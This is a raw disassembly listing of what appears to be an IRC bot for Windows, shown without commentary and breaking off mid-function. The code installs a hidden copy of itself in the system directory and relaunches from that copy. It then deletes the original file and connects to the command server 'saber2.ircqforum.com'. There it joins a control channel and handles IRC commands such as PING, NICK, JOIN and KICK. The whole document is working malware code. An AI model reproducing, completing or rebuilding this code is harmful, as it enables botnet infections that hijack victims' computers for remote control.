; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E6A9 proc near ; CODE XREF: _0:00419CAD�p
var_988 = byte ptr -988h
var_884 = byte ptr -884h
var_883 = byte ptr -883h
var_6F4 = byte ptr -6F4h
var_5F4 = byte ptr -5F4h
var_4F0 = byte ptr -4F0h
var_3F0 = byte ptr -3F0h
var_2EC = byte ptr -2ECh
var_1E8 = byte ptr -1E8h
var_E4 = byte ptr -0E4h
var_64 = dword ptr -64h
var_58 = dword ptr -58h
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 988h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_C], ebx
mov [ebp+var_8], offset sub_40D3A5
push [ebp+var_8]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_424058
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ds:dword_489C50, eax
call esi ; GetTickCount
push eax
call sub_417300
pop ecx
call sub_40981F
push 2
call ds:dword_43F714 ; SetErrorMode
push 7530h
push offset aBotid ; "botid"
push ebx
push ebx
call ds:dword_424164 ; CreateMutexA
push eax
call ds:dword_424088 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40E726
push 1
call ds:off_42414C
loc_40E726: ; CODE XREF: sub_40E6A9+73�j
lea eax, [ebp+var_884]
push eax
push 202h
call ds:dword_43F5E0 ; WSAStartup
cmp eax, ebx
mov [ebp+var_8], eax
jnz loc_40EB89
cmp [ebp+var_884], 2
jnz loc_40EB83
xor eax, eax
mov al, [ebp+var_883]
cmp al, 2
jnz loc_40EB83
mov esi, 104h
lea eax, [ebp+var_3F0]
push esi
push eax
call ds:dword_424068 ; GetSystemDirectoryA
lea eax, [ebp+var_2EC]
push esi
push eax
push ebx
call ds:off_424100
push eax
call ds:off_424094
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push ebx
lea eax, [ebp+var_2EC]
push ebx
push eax
call sub_4192B8
add esp, 14h
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push offset aSS_2 ; "%s%s"
lea eax, [ebp+var_5F4]
push esi
push eax
call sub_41782A
lea eax, [ebp+var_3F0]
push eax
lea eax, [ebp+var_2EC]
push eax
call sub_417880
add esp, 1Ch
test eax, eax
jnz loc_40E98C
cmp ds:dword_42F5BC, ebx
mov esi, offset byte_42F678
jz short loc_40E824
push esi
xor edi, edi
call sub_417AB0
sub eax, 4
pop ecx
jz short loc_40E824
loc_40E801: ; CODE XREF: sub_40E6A9+179�j
call sub_41730A
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov ds:byte_42F678[edi], dl
inc edi
call sub_417AB0
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_40E801
loc_40E824: ; CODE XREF: sub_40E6A9+148�j
; sub_40E6A9+156�j
lea eax, [ebp+var_3F0]
push esi
push eax
lea eax, [ebp+var_1E8]
push offset aSS_3 ; "%s\\%s"
push eax
call sub_4172AE
add esp, 10h
lea eax, [ebp+var_1E8]
push eax
call ds:off_4240A8
cmp eax, 0FFFFFFFFh
jz short loc_40E864
lea eax, [ebp+var_1E8]
push 80h
push eax
call ds:dword_424128 ; SetFileAttributesA
loc_40E864: ; CODE XREF: sub_40E6A9+1A7�j
mov esi, ds:dword_424160
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
xor edi, edi
push eax
loc_40E87B: ; CODE XREF: sub_40E6A9+209�j
call esi ; CopyFileA
test eax, eax
jnz short loc_40E8B4
call ds:dword_42408C ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_40E8B4
cmp eax, 20h
jz short loc_40E895
cmp eax, 5
jnz short loc_40E8B4
loc_40E895: ; CODE XREF: sub_40E6A9+1E5�j
push 1
pop edi
push 3A98h
call ds:dword_424064 ; Sleep
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
push eax
jmp short loc_40E87B
; ---------------------------------------------------------------------------
loc_40E8B4: ; CODE XREF: sub_40E6A9+1D6�j
; sub_40E6A9+1E0�j ...
lea eax, [ebp+var_1E8]
push eax
call sub_40AB7C
pop ecx
lea eax, [ebp+var_1E8]
push 7
push eax
call ds:dword_424128 ; SetFileAttributesA
push 10h
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_417330
push 44h
lea eax, [ebp+var_64]
pop esi
push esi
push ebx
push eax
call sub_417330
add esp, 18h
mov [ebp+var_64], esi
mov [ebp+var_58], offset byte_43C80C
mov [ebp+var_34], bx
push 1
pop esi
mov [ebp+var_38], esi
call ds:dword_42415C ; GetCurrentProcessId
push eax
push esi
push 100000h
call ds:dword_4240FC ; OpenProcess
lea ecx, [ebp+var_2EC]
push ecx
push eax
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_988]
push offset dword_435144
push eax
call sub_4172AE
add esp, 14h
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_3F0]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_988]
push ebx
push eax
lea eax, [ebp+var_1E8]
push eax
call ds:dword_424120 ; CreateProcessA
test eax, eax
jz short loc_40E98C
push 0C8h
call ds:dword_424064 ; Sleep
push [ebp+var_1C]
mov esi, ds:off_424078
call esi ; sub_49C3D5
push [ebp+var_18]
call esi ; sub_49C3D5
call ds:dword_43F5C8 ; WSACleanup
push ebx
call ds:off_42414C
loc_40E98C: ; CODE XREF: sub_40E6A9+137�j
; sub_40E6A9+2B9�j
cmp ds:dword_48A030, 2
jle short loc_40E9D8
mov eax, ds:dword_48A034
push dword ptr [eax+4]
call sub_41781F
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_424088 ; WaitForSingleObject
push esi
call ds:off_424078
mov eax, ds:dword_48A034
cmp [eax+8], ebx
jz short loc_40E9D8
push 7D0h
call ds:dword_424064 ; Sleep
mov eax, ds:dword_48A034
push dword ptr [eax+8]
call ds:dword_424158 ; DeleteFileA
loc_40E9D8: ; CODE XREF: sub_40E6A9+2EA�j
; sub_40E6A9+314�j
cmp ds:dword_42F5C0, ebx
jz short loc_40E9F5
cmp ds:dword_43F738, ebx
jnz short loc_40E9F5
lea eax, [ebp+var_5F4]
push eax
call sub_40C1AE
pop ecx
loc_40E9F5: ; CODE XREF: sub_40E6A9+335�j
; sub_40E6A9+33D�j
lea eax, [ebp+var_E4]
push offset dword_43511C
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_E4]
push ebx
push eax
call sub_416D5A
lea eax, [ebp+var_E4]
push eax
call sub_40BF6D
push 0B80h
push ebx
push offset dword_444340
call sub_417330
call sub_41730A
push 7Fh
push offset aSaber2_ircqfor ; "saber2.ircqforum.com"
push offset dword_489C5C
mov ds:dword_489DD0, ebx
call sub_418C10
mov eax, ds:dword_42F5A0
push 3Fh
mov edi, offset dword_489CDC
push offset aFaak ; "#faak#"
push edi
mov ds:dword_489DAC, eax
call sub_418C10
push 3Fh
mov esi, offset dword_489D1C
push offset aSaad_ ; "saad."
push esi
call sub_418C10
add esp, 48h
mov ds:dword_489DB0, ebx
loc_40EA83: ; CODE XREF: sub_40E6A9+480�j
; sub_40E6A9+48B�j ...
mov [ebp+var_4], ebx
loc_40EA86: ; CODE XREF: sub_40E6A9+434�j
cmp ds:dword_43F750, ebx
jnz short loc_40EAA4
lea eax, [ebp+var_20]
push ebx
push eax
call ds:dword_43F5AC ; InternetGetConnectedState
test eax, eax
jnz short loc_40EAA4
push 7530h
jmp short loc_40EAD0
; ---------------------------------------------------------------------------
loc_40EAA4: ; CODE XREF: sub_40E6A9+3E3�j
; sub_40E6A9+3F2�j
push offset dword_489C58
mov ds:dword_489DCC, ebx
call sub_40EB92
cmp eax, 2
mov [ebp+var_8], eax
jz loc_40EB7E
cmp ds:dword_489DCC, ebx
jz short loc_40EACB
dec [ebp+var_4]
loc_40EACB: ; CODE XREF: sub_40E6A9+41D�j
push 0BB8h
loc_40EAD0: ; CODE XREF: sub_40E6A9+3F9�j
call ds:dword_424064 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_40EA86
cmp [ebp+var_8], 2
jz loc_40EB7E
cmp [ebp+var_C], ebx
jz short loc_40EB2E
push 7Fh
push offset aSaber2_ircqfor ; "saber2.ircqforum.com"
push offset dword_489C5C
call sub_418C10
mov eax, ds:dword_42F5A0
push 3Fh
push offset aFaak ; "#faak#"
push edi
mov ds:dword_489DAC, eax
call sub_418C10
push 3Fh
push offset aSaad_ ; "saad."
push esi
call sub_418C10
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_40EA83
; ---------------------------------------------------------------------------
loc_40EB2E: ; CODE XREF: sub_40E6A9+443�j
cmp ds:byte_42F654, bl
jz loc_40EA83
push 7Fh
push offset byte_42F654
push offset dword_489C5C
call sub_418C10
mov eax, ds:dword_42F5A4
push 3Fh
push offset aFaak_0 ; "#faak#"
push edi
mov ds:dword_489DAC, eax
call sub_418C10
push 3Fh
push offset aSaad__0 ; "saad."
push esi
call sub_418C10
add esp, 24h
mov [ebp+var_C], 1
jmp loc_40EA83
; ---------------------------------------------------------------------------
loc_40EB7E: ; CODE XREF: sub_40E6A9+411�j
; sub_40E6A9+43A�j
call sub_416F23
loc_40EB83: ; CODE XREF: sub_40E6A9+A1�j
; sub_40E6A9+B1�j
call ds:dword_43F5C8 ; WSACleanup
loc_40EB89: ; CODE XREF: sub_40E6A9+94�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40E6A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB92 proc near ; CODE XREF: sub_40E6A9+406�p
; DATA XREF: sub_40EE72+3B0C�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_40EBB7: ; CODE XREF: sub_40EB92+E6�j
; sub_40EB92+136�j ...
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_3C]
call ds:dword_43F668 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_40ADCA
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_40ECE4
push 1Ch
lea eax, [ebp+var_2C]
push 0
push eax
call sub_417330
push 0
lea eax, [ebp+var_2C]
push ds:dword_489DC0
push ds:dword_42F5CC
push eax
call sub_415CFF
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_4450D8
push edi
push eax
call sub_418C10
add esp, 28h
push 6
push 1
push 2
call ds:dword_43F6E8 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov ds:dword_4450CC[eax], esi
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_43F610 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40EC7D
push esi
call ds:dword_43F700 ; closesocket
call sub_40ADF3
push 7D0h
loc_40EC72: ; CODE XREF: sub_40EB92+146�j
call ds:dword_424064 ; Sleep
jmp loc_40EBB7
; ---------------------------------------------------------------------------
loc_40EC7D: ; CODE XREF: sub_40EB92+CD�j
lea eax, [ebp+var_18C]
push eax
push offset dword_435150
call sub_40BFE1
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40ECFA
add esp, 28h
mov edi, eax
push esi
call ds:dword_43F700 ; closesocket
test edi, edi
jz loc_40EBB7
cmp edi, 1
jnz short loc_40ECDA
push 0DBBA0h
jmp short loc_40EC72
; ---------------------------------------------------------------------------
loc_40ECDA: ; CODE XREF: sub_40EB92+13F�j
cmp edi, 2
jz short loc_40ECE8
jmp loc_40EBB7
; ---------------------------------------------------------------------------
loc_40ECE4: ; CODE XREF: sub_40EB92+5A�j
xor eax, eax
jmp short loc_40ECF4
; ---------------------------------------------------------------------------
loc_40ECE8: ; CODE XREF: sub_40EB92+14B�j
push [ebp+var_34]
call sub_417076
pop ecx
push 2
pop eax
loc_40ECF4: ; CODE XREF: sub_40EB92+154�j
pop edi
pop esi
leave
retn 4
sub_40EB92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECFA proc near ; CODE XREF: sub_40EB92+123�p
var_1A10 = byte ptr -1A10h
var_A10 = byte ptr -0A10h
var_240 = byte ptr -240h
var_1A0 = byte ptr -1A0h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A10h
call sub_417B30
push ebx
push esi
push edi
xor ebx, ebx
push 2
mov [ebp+var_8], ebx
lea eax, [ebp+var_1A0]
pop ecx
loc_40ED18: ; CODE XREF: sub_40ECFA+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_40ED18
cmp ds:byte_489DC8, bl
jz short loc_40ED3F
push offset byte_489DC8
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0]
call sub_40D633
add esp, 0Ch
loc_40ED3F: ; CODE XREF: sub_40ECFA+2E�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push ebx
push ebx
push 2
push eax
call sub_415CFF
add esp, 10h
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_4172AE
add esp, 14h
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40EDA9
push [ebp+arg_0]
call ds:dword_43F700 ; closesocket
push 1388h
call ds:dword_424064 ; Sleep
loc_40EDA2: ; CODE XREF: sub_40ECFA+D9�j
; sub_40ECFA+153�j
xor eax, eax
loc_40EDA4: ; CODE XREF: sub_40ECFA+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40EDA9: ; CODE XREF: sub_40ECFA+92�j
; sub_40ECFA+F8�j ...
mov esi, 1000h
lea eax, [ebp+var_1A10]
push esi
push ebx
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_1A10]
push ebx
push esi
push eax
push [ebp+arg_0]
call ds:dword_43F680 ; recv
test eax, eax
jle short loc_40EDA2
lea eax, [ebp+var_A10]
push eax
lea eax, [ebp+var_1A10]
push eax
call sub_40A868
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_40EDA9
lea edi, [ebp+var_A10]
loc_40EDFA: ; CODE XREF: sub_40ECFA+165�j
push 1
pop esi
loc_40EDFD: ; CODE XREF: sub_40ECFA+144�j
push [ebp+arg_1C]
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_240]
push eax
lea eax, [ebp+var_1A0]
push eax
push [ebp+arg_18]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [edi]
call sub_40EE72
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_40EE40
push 7D0h
call ds:dword_424064 ; Sleep
jmp short loc_40EDFD
; ---------------------------------------------------------------------------
loc_40EE40: ; CODE XREF: sub_40ECFA+137�j
cmp esi, 0FFFFFFFDh
jz short loc_40EE6A
cmp esi, 0FFFFFFFEh
jz short loc_40EE66
cmp esi, 0FFFFFFFFh
jz loc_40EDA2
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_40EDFA
jmp loc_40EDA9
; ---------------------------------------------------------------------------
loc_40EE66: ; CODE XREF: sub_40ECFA+14E�j
push 1
jmp short loc_40EE6C
; ---------------------------------------------------------------------------
loc_40EE6A: ; CODE XREF: sub_40ECFA+149�j
push 2
loc_40EE6C: ; CODE XREF: sub_40ECFA+16E�j
pop eax
jmp loc_40EDA4
sub_40ECFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE72 proc near ; CODE XREF: sub_40ECFA+12A�p
var_15B0 = byte ptr -15B0h
var_11B0 = byte ptr -11B0h
var_FB0 = byte ptr -0FB0h
var_DB0 = byte ptr -0DB0h
var_CB0 = byte ptr -0CB0h
var_CAC = byte ptr -0CACh
var_BAC = byte ptr -0BACh
var_BA8 = byte ptr -0BA8h
var_AA8 = byte ptr -0AA8h
var_A28 = byte ptr -0A28h
var_9C7 = byte ptr -9C7h
var_9C6 = byte ptr -9C6h
var_9C4 = byte ptr -9C4h
var_9C3 = byte ptr -9C3h
var_9BA = byte ptr -9BAh
var_9B8 = byte ptr -9B8h
var_9B6 = byte ptr -9B6h
var_9B5 = byte ptr -9B5h
var_928 = byte ptr -928h
var_90C = dword ptr -90Ch
var_908 = byte ptr -908h
var_804 = dword ptr -804h
var_800 = dword ptr -800h
var_7FC = byte ptr -7FCh
var_7F8 = dword ptr -7F8h
var_7F4 = byte ptr -7F4h
var_7F0 = dword ptr -7F0h
var_7EC = dword ptr -7ECh
var_7E8 = byte ptr -7E8h
var_780 = byte ptr -780h
var_774 = byte ptr -774h
var_770 = dword ptr -770h
var_76C = byte ptr -76Ch
var_768 = byte ptr -768h
var_75C = byte ptr -75Ch
var_73C = dword ptr -73Ch
var_738 = byte ptr -738h
var_710 = dword ptr -710h
var_708 = byte ptr -708h
var_6FC = dword ptr -6FCh
var_6F8 = byte ptr -6F8h
var_6F4 = byte ptr -6F4h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_6E8 = byte ptr -6E8h
var_6B8 = byte ptr -6B8h
var_681 = byte ptr -681h
var_680 = byte ptr -680h
var_678 = byte ptr -678h
var_670 = byte ptr -670h
var_66C = byte ptr -66Ch
var_668 = byte ptr -668h
var_5F8 = byte ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_570 = dword ptr -570h
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
var_55C = byte ptr -55Ch
var_50C = dword ptr -50Ch
var_508 = byte ptr -508h
var_504 = dword ptr -504h
var_500 = byte ptr -500h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = byte ptr -4E8h
var_4C0 = byte ptr -4C0h
var_4A0 = dword ptr -4A0h
var_488 = byte ptr -488h
var_480 = dword ptr -480h
var_47C = dword ptr -47Ch
var_478 = dword ptr -478h
var_474 = dword ptr -474h
var_470 = dword ptr -470h
var_46C = dword ptr -46Ch
var_468 = dword ptr -468h
var_464 = dword ptr -464h
var_460 = dword ptr -460h
var_45C = byte ptr -45Ch
var_458 = byte ptr -458h
var_444 = byte ptr -444h
var_434 = byte ptr -434h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_40C = dword ptr -40Ch
var_408 = byte ptr -408h
var_3FC = byte ptr -3FCh
var_3F8 = byte ptr -3F8h
var_3D8 = byte ptr -3D8h
var_3B4 = byte ptr -3B4h
var_398 = byte ptr -398h
var_388 = byte ptr -388h
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = byte ptr -2F8h
var_2EC = word ptr -2ECh
var_2EA = word ptr -2EAh
var_2E8 = dword ptr -2E8h
var_2DC = byte ptr -2DCh
var_DC = dword ptr -0DCh
var_D8 = byte ptr -0D8h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_54 = byte ptr -54h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 15B0h
call sub_417B30
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
mov [ebp+var_C0], 3
mov [ebp+var_10], ebx
mov [ebp+var_AC], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_DC], ebx
call sub_417330
push 1Bh
lea eax, [ebp+var_928]
push [ebp+arg_10]
push eax
call sub_418C10
add esp, 18h
cmp [ebp+arg_0], ebx
jz loc_40F239
push esi
lea eax, [ebp+var_FB0]
push ebx
push eax
call sub_417330
dec esi
lea eax, [ebp+var_FB0]
push esi
push [ebp+arg_0]
push eax
call sub_418C10
lea eax, [ebp+var_FB0]
push offset asc_4387B8 ; " :"
push eax
call sub_417880
mov [ebp+var_C], eax
lea eax, [ebp+var_FB0]
push esi
push eax
lea eax, [ebp+var_11B0]
push eax
call sub_418C10
mov esi, offset asc_42A3B4 ; " "
lea eax, [ebp+var_11B0]
push esi
push eax
call sub_418B6E
add esp, 34h
mov [ebp+var_94], eax
lea edi, [ebp+var_90]
mov [ebp+var_BC], 1Fh
loc_40EF45: ; CODE XREF: sub_40EE72+E7�j
push esi
push ebx
call sub_418B6E
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+var_BC]
pop ecx
jnz short loc_40EF45
mov esi, [ebp+var_94]
cmp esi, ebx
jz loc_40F239
cmp [ebp+var_90], ebx
jz loc_40F239
push 100h
lea eax, [ebp+var_A28]
push ebx
push eax
call sub_417330
add esp, 0Ch
lea ecx, [ebp+var_18]
push 1Fh
pop edx
push 1
pop edi
loc_40EF93: ; CODE XREF: sub_40EE72+153�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_40EFBF
cmp byte ptr [eax], 2Dh
jnz short loc_40EFC7
cmp [eax+2], bl
jnz short loc_40EFC7
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_A28], 1
mov esi, [ebp+var_94]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_40EFBF: ; CODE XREF: sub_40EE72+125�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_40EF93
loc_40EFC7: ; CODE XREF: sub_40EE72+12A�j
; sub_40EE72+12F�j
cmp [ebp+var_9B5], bl
jz short loc_40EFD2
mov [ebp+var_8], edi
loc_40EFD2: ; CODE XREF: sub_40EE72+15B�j
cmp [ebp+var_9BA], bl
jz short loc_40EFE0
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_40EFE0: ; CODE XREF: sub_40EE72+166�j
cmp byte ptr [esi], 0Ah
jz short loc_40F01A
push 7Fh
lea eax, [ebp+var_AA8]
push esi
push eax
call sub_418C10
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp+var_D8]
push eax
call sub_418C10
lea eax, [ebp+var_D8]
push offset asc_4387B4 ; "!"
push eax
call sub_418B6E
add esp, 20h
loc_40F01A: ; CODE XREF: sub_40EE72+171�j
push esi
push offset aPing ; "PING"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F06B
push [ebp+var_90]
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_40D633
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_40F10F
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 10h
jmp loc_40F10F
; ---------------------------------------------------------------------------
loc_40F06B: ; CODE XREF: sub_40EE72+1B7�j
mov esi, [ebp+var_90]
push esi
push offset a001 ; "001"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4150D1
push esi
push offset a005 ; "005"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4150D1
push esi
push offset a302 ; "302"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F0D3
push offset a@ ; "@"
push [ebp+var_88]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40F10F
inc eax
push 9Fh
push eax
push [ebp+arg_1C]
call sub_418C10
jmp short loc_40F10C
; ---------------------------------------------------------------------------
loc_40F0D3: ; CODE XREF: sub_40EE72+238�j
push esi
push offset a433 ; "433"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F116
push ebx
push ds:dword_489DC0
push ds:dword_42F5CC
push [ebp+arg_10]
call sub_415CFF
add esp, 10h
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_40D633
loc_40F10C: ; CODE XREF: sub_40EE72+25F�j
add esp, 0Ch
loc_40F10F: ; CODE XREF: sub_40EE72+1D8�j
; sub_40EE72+1F4�j ...
mov eax, edi
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_40F116: ; CODE XREF: sub_40EE72+270�j
mov esi, [ebp+arg_18]
mov [ebp+var_BC], 2
mov edi, 80h
loc_40F128: ; CODE XREF: sub_40EE72+2DB�j
lea eax, [ebp+var_AA8]
push eax
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F145
mov [ebp+var_AC], 1
loc_40F145: ; CODE XREF: sub_40EE72+2C7�j
add esi, edi
dec [ebp+var_BC]
jnz short loc_40F128
mov esi, [ebp+var_90]
push esi
push offset aKick ; "KICK"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F241
mov esi, [ebp+arg_18]
mov [ebp+arg_24], 2
loc_40F174: ; CODE XREF: sub_40EE72+392�j
cmp [esi], bl
jz loc_40F1FF
push 7Fh
lea eax, [ebp+var_AA8]
push esi
push eax
call sub_418C10
lea eax, [ebp+var_D8]
add esp, 0Ch
test eax, eax
jz short loc_40F1FF
cmp [ebp+var_88], ebx
jz short loc_40F1FF
push [ebp+var_88]
lea eax, [ebp+var_D8]
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F1FF
lea eax, [ebp+var_D8]
mov [esi], bl
push eax
lea eax, [ebp+var_2DC]
push offset dword_438738
push eax
call sub_4172AE
add esp, 0Ch
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_40D633
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
add esp, 14h
loc_40F1FF: ; CODE XREF: sub_40EE72+304�j
; sub_40EE72+324�j ...
add esi, edi
dec [ebp+arg_24]
jnz loc_40F174
push [ebp+var_88]
push [ebp+arg_10]
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F239
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8]
mov [eax], ebx
push offset aJoinSS ; "JOIN %s %s\r\n"
loc_40F22E: ; CODE XREF: sub_40EE72+618�j
; sub_40EE72+978�j
push [ebp+arg_4]
call sub_40D633
loc_40F236: ; CODE XREF: sub_40EE72+57D6�j
; sub_40EE72+57F3�j ...
add esp, 10h
loc_40F239: ; CODE XREF: sub_40EE72+5B�j
; sub_40EE72+F1�j ...
push 1
loc_40F23B: ; CODE XREF: sub_40EE72+5CE9�j
pop eax
loc_40F23C: ; CODE XREF: sub_40EE72+29F�j
; sub_40EE72+229D�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40F241: ; CODE XREF: sub_40EE72+2F2�j
push esi
push offset aNick ; "NICK"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40F397
mov eax, [ebp+var_8C]
mov esi, [ebp+arg_18]
inc eax
